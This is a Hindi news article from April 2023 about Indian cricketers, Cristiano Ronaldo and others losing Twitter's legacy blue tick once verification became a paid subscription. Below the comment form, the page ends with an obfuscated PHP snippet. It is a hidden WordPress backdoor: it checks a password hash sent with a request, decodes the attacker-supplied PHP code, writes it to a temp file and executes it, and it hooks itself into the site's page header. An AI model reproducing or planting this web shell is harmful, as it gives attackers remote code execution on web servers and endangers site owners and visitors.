Twitter blue tick: विराट कोहली, एमएस धोनी और रोहित शर्मा सहित कई क्रिकेटर्स ने गंवाए ‘ब्‍ल्‍यू टिक’, जानें कारण

Uttarakhand Press News, 21 April 2023: भारतीय कप्‍तान रोहित शर्मा, विराट कोहली और एमएस धोनी सहित कई मौजूदा और पूर्व क्रिकेटर्स ने गुरुवार को सोशल मीडिया प्‍लेटफॉर्म ट्विटर पर अपना ‘ब्‍ल्‍यू टिक’ गंवा दिया है। ट्विटर पर ब्‍ल्‍यू टिक को वेरीफाइड अकाउंट माना जाता है। पिछले साल एलन मस्‍क ने ट्विटर खरीदा और प्‍लेटफॉर्म ने वेरीफाइड टिक की विरासत को हटाना शुरू किया।

एलन मस्‍क के प्रबंधन में ट्विटर ने अपने ब्‍ल्‍यू टिक को पेड सबस्क्रिप्‍शन पर ला दिया। इसके अंतर्गत अगर यूजर को वेरीफाइड ब्‍ल्‍यू टिक चाहिए तो उसे महीने की एक कीमत चुकाना होगी। इसके चलते भारत के कई दिग्‍गज क्रिकेटर्स ने ट्विटर पर अपना वेरीफिकेशन टिक गंवा दिया है। वैसे, ब्‍ल्‍यू टिक गंवाने का सिलसिला केवल भारतीय क्रिकेटर्स तक सीमित नहीं है। महान फुटबॉलर क्रिस्टियानो रोनाल्‍डो ने भी प्‍लेटफॉर्म पर ब्‍ल्‍यू टिक गंवा दिया है।

एलक मस्‍क के मालिक बनने के बाद ट्विटर ने अपनी नीति में बदलाव किया। पहले ब्‍ल्‍यू टिक से वेरीफाइड अकाउंट की पुष्टि होती है। यह मशहूर हस्‍तियों, पत्रकारों, राजनेताओं और अन्‍य दिग्‍गजों की पहचान कराता था। मस्‍क ने नवंबर में कहा था कि ट्विटर 8 डॉलर प्रति महीने का चार्ज लगाएगा ताकि विज्ञापनों के अलावा राजस्‍व निकालने की नई तरकीब खोजी जा सके। कंपनी ने बाद में अन्‍य रंगों में चेक-मार्क्‍स का प्रस्‍ताव लाई जिसमें गोल्‍ड रंग से बिजनेर जबकि सरकार और कई संस्‍थाओं व अधिकारियों की पहचान ग्रे रंग से होती।

ट्विटर के लिए ब्‍ल्‍यू टिक की कीमत व्‍यक्तिगत यूजर के लिए 8 डॉलर प्रति महीना है। अगर किसी संस्‍था को वेरीफिकेशन चाहिए तो उसे मासिक 1,000 डॉलर का भुगतान करना होगा और अगर उससे संबंधित व्‍यक्ति या कर्मचारी अकाउंट हो तो 50 डॉलर महीने के अतिरिक्‍त देना होंगे। ट्विटर व्यक्तिगत खातों को सत्यापित नहीं करता है, जैसा कि मंच के प्री-मस्क प्रशासन के दौरान पिछले ब्लू चेक के मामले में था। दिग्‍गज बास्‍केटबॉल खिलाड़ी लीब्रॉन जेम्‍स के पास अब भी ब्‍ल्‍यू टिक बरकरार है। इससे संकेत मिलता है कि उन्‍होंने पहले ही ट्विटर ब्‍ल्‍यू का सबस्क्रिप्‍शन ले लिया है।

Read Previous

अतीक अहमद हत्याकांड के बाद बढ़ाई गई मुख्यमंत्री योगी के परिवार की सुरक्षा, उत्तराखंड पुलिस हुई सतर्क..

Read Next

Uttarakhand: प्रदेश में अब हटेंगे वन भूमि पर वर्ष 1980 के बाद बने धर्म स्थल, अतिक्रमण करने वालों पर होगा मुकदमा

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}